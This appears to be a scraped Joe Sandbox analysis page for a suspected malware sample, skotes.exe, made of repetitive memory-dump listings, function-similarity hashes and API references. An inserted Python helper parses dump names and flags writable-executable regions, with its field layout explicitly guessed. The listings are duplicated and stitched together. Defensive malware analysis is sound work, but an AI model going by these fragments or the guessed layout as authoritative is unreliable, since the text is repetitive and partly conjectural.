                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
• String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
• API String ID: 348560076-465693683
• Opcode ID: 976dbef2164c2fc037ccb6a95a9b41d72a41619a231f61fa5add58a16abb4e81
• Instruction ID: 9a212ccad3bc8033c097755a096add919887d1aa97b4c2ad5ca3780c85a0e85d
• Opcode Fuzzy Hash: 976dbef2164c2fc037ccb6a95a9b41d72a41619a231f61fa5add58a16abb4e81
• Instruction Fuzzy Hash: 32014571B423212E971073B65C8EEFB399F8E07704321143EBA05E7283EEB1CC404669
APIs
• StructuredWorkStealingQueue.LIBCMT ref: 006C20B7
  • Part of subcall function 006BCAF3: Mailbox.LIBCMT ref: 006BCB2D
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C20C8
• StructuredWorkStealingQueue.LIBCMT ref: 006C20FE
• Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C210F
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
• String ID: e
• API String ID: 1411586358-4024072794
• Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
• Instruction ID: 886f0ac0044c9fb43c9a33f0c2c4f1395064b15a1b29c94f8b4239f1a270a46e
• Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
• Instruction Fuzzy Hash: 26119131200106ABDB55DE69C8A5FBA77A6EF02324B18C19EFD06DF202DB71D901CBA1
APIs
Strings
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 006AD03B
• WakeAllConditionVariable, xrefs: 006AD069
• kernel32.dll, xrefs: 006AD04C
• SleepConditionVariableCS, xrefs: 006AD05D
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: ___scrt_fastfail
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2964418898-3242537097
• Opcode ID: 74582bad304c3a79328570c3543374fe419e0134483882443c07a7b778f25538
• Instruction ID: 03e4ef009406d237c1c22d5448fb29284c330a34eb4451fbab7e4172e7705d2e
• Opcode Fuzzy Hash: 74582bad304c3a79328570c3543374fe419e0134483882443c07a7b778f25538
• Instruction Fuzzy Hash: 0D0162A1B837116A9B313B765C0DEAB218B8B47B40F0A2511BE06EBA91EB60CC419D75
APIs
• Concurrency::location::_Assign.LIBCMT ref: 006BE91E
• Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 006BE926
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BE950
• Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 006BE959
• Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006BE9DC
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
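The Memory Dump Source entries above name each .sdmp file with a fixed dotted layout. The Python below is an added example, not part of the Joe Sandbox report: it parses those names, decodes the protection field with the standard Win32 PAGE_* constants, groups the dumps of one process by protection, and lists the image-backed regions that are both writable and executable, which is the first thing to check when deciding whether a loaded PE had its section rights changed after mapping. The field layout (process index, dump stage, sequence number, base address, protection, memory type) is an assumption inferred from the names on this page and from the IDA snapshot name hcaresult_3_2_690000_skotes.jbxd, which echoes process 3, stage 2 and base 0x690000; the report itself only confirms the base address ("Offset: 00690000, based on PE: true"). The two fields named f6 and f8 are left undecoded. The sample list is a subset of the names in the entry above.

```python
"""Decode Joe Sandbox .sdmp memory-dump names (added example, not report code)."""
import re
from collections import Counter
from dataclasses import dataclass

# Documented Win32 memory-protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Both values combine execute with write (or copy-on-write) access.
WRITABLE_EXECUTABLE = 0x40 | 0x80
MEM_IMAGE = 0x01000000  # documented MEM_IMAGE type; matches "based on PE: true"

# ASSUMED layout (inferred from the report, not documented on the page):
#   <proc>.<stage>.<seq>.<base>.<protect>.<f6>.<mtype>.<f8>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<f6>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<f8>[0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    proc: int       # process index within the analysis (assumed)
    stage: int      # dump stage (assumed)
    seq: int        # sequence number (assumed)
    base: int       # region base address
    protect: int    # Win32 protection value
    mtype: int      # Win32 memory type (MEM_IMAGE for PE-backed regions)
    name: str

    @property
    def protect_name(self) -> str:
        # Mask off modifier bits such as PAGE_GUARD before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")


def parse_sdmp(name: str) -> DumpRegion:
    """Split one .sdmp file name into its fields; raises on unknown layouts."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return DumpRegion(
        proc=int(m["proc"], 16), stage=int(m["stage"], 16), seq=int(m["seq"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        mtype=int(m["mtype"], 16), name=name,
    )


def protection_summary(names) -> dict:
    """Count dumps per decoded protection name."""
    return dict(Counter(parse_sdmp(n).protect_name for n in names))


def writable_executable_image_regions(names) -> list:
    """Image-backed regions whose pages are writable and executable at once."""
    return [r for r in map(parse_sdmp, names)
            if r.mtype == MEM_IMAGE and r.protect & WRITABLE_EXECUTABLE]


# Constructed sample: six of the names listed under Memory Dump Source above.
SAMPLE_DUMPS = [
    "00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp",
    "00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp",
]

if __name__ == "__main__":
    for region in map(parse_sdmp, SAMPLE_DUMPS):
        print(f"proc {region.proc} stage {region.stage} base 0x{region.base:X} "
              f"{region.protect_name}")
    print(protection_summary(SAMPLE_DUMPS))
    for region in writable_executable_image_regions(SAMPLE_DUMPS):
        print(f"W+X image region at 0x{region.base:X} ({region.protect_name})")
```

The PE header region at 0x690000 decodes as PAGE_READWRITE, while the regions starting at 0x691000 alternate between PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY; a loader normally maps code sections PAGE_EXECUTE_READ, so every region the last function returns is one to diff against the on-disk section table.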
Similarity
• API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
• String ID:
• API String ID: 512098550-0
• Opcode ID: a4b7dbe58ba24ee3624bcb0af459afc05ca5a26c728ca93ea7feb7efc3e2c5c5
• Instruction ID: 61e433b69a738b9b0cbfb91e9969f5d326e1a41f3d33826016677bcd3ced4333
• Opcode Fuzzy Hash: a4b7dbe58ba24ee3624bcb0af459afc05ca5a26c728ca93ea7feb7efc3e2c5c5
• Instruction Fuzzy Hash: 8C416075A00219EFCB09EF64C494AEDB7B6FF48310F048159E506AB390CB74AE41CF81
APIs
• Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 006BD344
• ListArray.LIBCONCRT ref: 006BD367
• Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 006BD370
• ListArray.LIBCONCRT ref: 006BD3A8
• Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006BD3B3
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
• String ID:
• API String ID: 4212520697-0
• Opcode ID: b3ef916a54d99538d6be94e2334583ff7db62da73384d50489f0a0fde816dbd2
• Instruction ID: 376bbc039e8bd6ea7b637b758d5d0eb2d033e7ffdad0687da7814987dc1c69d1
• Opcode Fuzzy Hash: b3ef916a54d99538d6be94e2334583ff7db62da73384d50489f0a0fde816dbd2
• Instruction Fuzzy Hash: DB31A0B57006109FDB05EB54C885BEDB7E7AF89310F150199E9069F392EB70ED81CB92
APIs
• _SpinWait.LIBCONCRT ref: 006B86EE
  • Part of subcall function 006AEAD0: _SpinWait.LIBCONCRT ref: 006AEAE8
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 006B8702
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006B8734
• List.LIBCMT ref: 006B87B7
• List.LIBCMT ref: 006B87C6
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
• API String ID: 3281396844-0
• Opcode ID: e54d22f4ee979e76a70a19909b53c15c8e6d6305873fd619e0c6e8191b632c15
• Instruction ID: 9f4c2b250e9ae1f64da136d4b1e9c40ee710e8f81bf6db30b7ceb1b25ba6012e
• Opcode Fuzzy Hash: e54d22f4ee979e76a70a19909b53c15c8e6d6305873fd619e0c6e8191b632c15
• Instruction Fuzzy Hash: 833186B2901256DFCB50EFA4C5816EDBBB6BF05308F28007ED80127242CF31AD84CB99
APIs
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 006C18A4
• Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006C18EB
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
• String ID: pContext
• API String ID: 3390424672-2046700901
• Opcode ID: 8da8468f0bd94e65718a0ef299205c255f97352cef4dae213f0574cf085ca712
• Instruction ID: c52535b7508d957dca77daec0895ecdfaf9d97c45851870c7a108f8901623b3b
• Opcode Fuzzy Hash: 8da8468f0bd94e65718a0ef299205c255f97352cef4dae213f0574cf085ca712
• Instruction Fuzzy Hash: 0D21F335B056159BCB14AB68C895FBCB3A7FF97324B04012EE5018F2D2CBA4ED428A94
Strings
• 6l, xrefs: 006CE034
• C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 006CDFE8
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
